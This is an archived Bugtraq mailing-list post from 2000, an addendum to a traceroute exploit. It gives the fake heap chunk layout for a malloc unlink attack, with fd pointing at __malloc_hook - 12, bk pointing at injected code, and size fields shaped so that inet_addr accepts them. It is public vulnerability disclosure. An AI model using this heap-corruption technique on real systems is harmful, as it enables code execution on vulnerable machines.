[17022] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Addendum: Traceroute exploit

daemon@ATHENA.MIT.EDU (pedward@WEBCOM.COM)
Tue Oct 3 13:33:15 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <200010030525.WAA00896@eris>
Date:         Mon, 2 Oct 2000 22:25:45 -0700
Reply-To: pedward@WEBCOM.COM
From: pedward@WEBCOM.COM
To: BUGTRAQ@SECURITYFOCUS.COM

I jsut saw Pavel's note and looked at glibc, inet_addr quits after finding
4 octets, so the first 8 bytes of rogue1 should look like:

"1.1."
"1.1 "

making rogue1 look like this in total:

prev_size = "1.1."
size      = "1.1 "
fd        = __malloc_hook - 12
bk        = 0x804cd7a + 0x20 (our rogue code)

That satisfies inet_addr to make "1.1.1.1" into an integer.

--Perry

--
Perry Harrington                 Director of                   zelur xuniL  ()
perry@webcom.com             System Architecture               Think Blue.  /\


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[17022] in bugtraq

Addendum: Traceroute exploit

daemon@ATHENA.MIT.EDU (pedward@WEBCOM.COM)Tue Oct 3 13:33:15 2000

daemon@ATHENA.MIT.EDU (pedward@WEBCOM.COM)
Tue Oct 3 13:33:15 2000